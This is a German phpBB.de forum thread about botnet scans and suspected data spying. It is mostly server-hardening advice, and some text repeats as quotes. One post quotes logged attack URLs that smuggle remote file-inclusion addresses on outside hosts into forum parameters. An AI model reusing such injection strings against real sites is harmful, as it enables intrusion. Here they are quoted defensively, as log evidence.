Diskussion zu Benutzerdaten auf phpBB.de ausspioniert
Bei diesen Einträgen in deinem Apache access_log handelt es sich um die Zugriffsversuche von Botnetzen die deinen Server auf bekannte Schwachstellen durchsuchen.
Anders ausgedrückt - solange du keine veraltete oder als gefährlich bekannte Software auf deinem Server liegen hast (gilt im übrigen auch für PHP und den Apache) kannst du dieses leider unvermeidliche Internet Hintergrundrauschen getrost ignorieren. Die einzige Alternative wäre deinen Server vom Netz zu nehmen.
Schau dir auch mal dein Systemlog an
Maßnahmen die du ansonsten treffen kannst:
- SSH Zugang zu deinem Server sichern (kein direkter Root Zugang/Port verlegen oder Zugang nur noch über Schlüsselaustausch möglich)
- Apache Konfiguration prüfen (mod_security verwenden + 'ServerTokens Prod' und 'TraceEnable Off' in der httpd.conf)
- chmod 0710 auf deinen Webroot und die darunterliegenden Verzeichnisse
- PHP Konfiguration prüfen (save_mode on, register_globals off, allow_url_fopen off + suhosin mod verwenden)
- Deinen Server updaten über yast, smart oder einen anderen Packetmanager
- Schau dir mal iptables (Packetfilter) an. Zusammen mit dem recent mod kann man interessante Dinge machen
- Schau dir mal fail2ban an
- Schau dir mal GRSECURITY (Kernel Patch) an
- Schau dir mal tripwire (Open Source Intrusion Detection System) an
- Schau dir an was dein Server so für treibt ('ps aux' und/oder 'netstat -pl' und verzichte auf unnötige Dienste)
- Kontrolliere das keine unnötigen Dateien auf deinem Server das setuid/setgid-Binarie gesetzt haben
Anders ausgedrückt - solange du keine veraltete oder als gefährlich bekannte Software auf deinem Server liegen hast (gilt im übrigen auch für PHP und den Apache) kannst du dieses leider unvermeidliche Internet Hintergrundrauschen getrost ignorieren. Die einzige Alternative wäre deinen Server vom Netz zu nehmen.
Schau dir auch mal dein Systemlog an
Maßnahmen die du ansonsten treffen kannst:
- SSH Zugang zu deinem Server sichern (kein direkter Root Zugang/Port verlegen oder Zugang nur noch über Schlüsselaustausch möglich)
- Apache Konfiguration prüfen (mod_security verwenden + 'ServerTokens Prod' und 'TraceEnable Off' in der httpd.conf)
- chmod 0710 auf deinen Webroot und die darunterliegenden Verzeichnisse
- PHP Konfiguration prüfen (save_mode on, register_globals off, allow_url_fopen off + suhosin mod verwenden)
- Deinen Server updaten über yast, smart oder einen anderen Packetmanager
- Schau dir mal iptables (Packetfilter) an. Zusammen mit dem recent mod kann man interessante Dinge machen
- Schau dir mal fail2ban an
- Schau dir mal GRSECURITY (Kernel Patch) an
- Schau dir mal tripwire (Open Source Intrusion Detection System) an
- Schau dir an was dein Server so für treibt ('ps aux' und/oder 'netstat -pl' und verzichte auf unnötige Dienste)
- Kontrolliere das keine unnötigen Dateien auf deinem Server das setuid/setgid-Binarie gesetzt haben
- nickvergessen
- Ehrenadmin
- Beiträge: 11559
- Registriert: 09.10.2006 21:56
- Wohnort: Stuttgart, Germany
- Kontaktdaten:
@Seether
.zz muste ich das forum offline nehmen das aus nicht erklärbaren gründen, alles sehr lahm ist.
auch haben sicherheitsscripte angeschlagen ( adminzugang) mehrfach loginversuche
wie schon hier geschrieben, habe die selben zugriffe, mitlerweile 3 ipsdjmarten hat geschrieben:vielen dank für die info @phpbb team
auch wir musten gestern 2 versuchte angriffe feststellen
es wurde über 2 ips versucht,
Malaysia(MY) in region Asia
Spain(ES) in region Europe
und mit ca 50 links
siehe hier viewtopic.php?t=1187&postdays=0&postorder=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F&vote=viewresult
login.php?redirect=viewforum.php&f=41&start=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F
viewtopic.php?t=150&view=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
usw.
sonnst war eigendlich imemr ruhe, seit ewigkeiten, da libw-perl und co ehh gespert sind.
könnte da ein zusammenhang sein?
.zz muste ich das forum offline nehmen das aus nicht erklärbaren gründen, alles sehr lahm ist.
auch haben sicherheitsscripte angeschlagen ( adminzugang) mehrfach loginversuche
Ähm, tut mir echt leid, aber ich verstehe leider nur Bahnhof und mir brennt doch noch eine Frage auf der Seele.. Gilt diese Spionage der Benutzerdaten nur für Mitglieder dieses Supportforums oder ist mein eigenes bboard auch gefährdet. Muss ich die Mitglieder informieren & auch bitten die Passwörter zu ändern oder hat das beides gar nichts miteinander zu tun?? Wäre echt nett, wenn mir das jemand beantworten könnte.
Schau mal bitte das an:djmarten hat geschrieben:@Seether
.zz muste ich das forum offline nehmen das aus nicht erklärbaren gründen, alles sehr lahm ist.
http://www.phpbb.de/viewtopic.php?t=164319
Ist das bei Dir so ähnlich?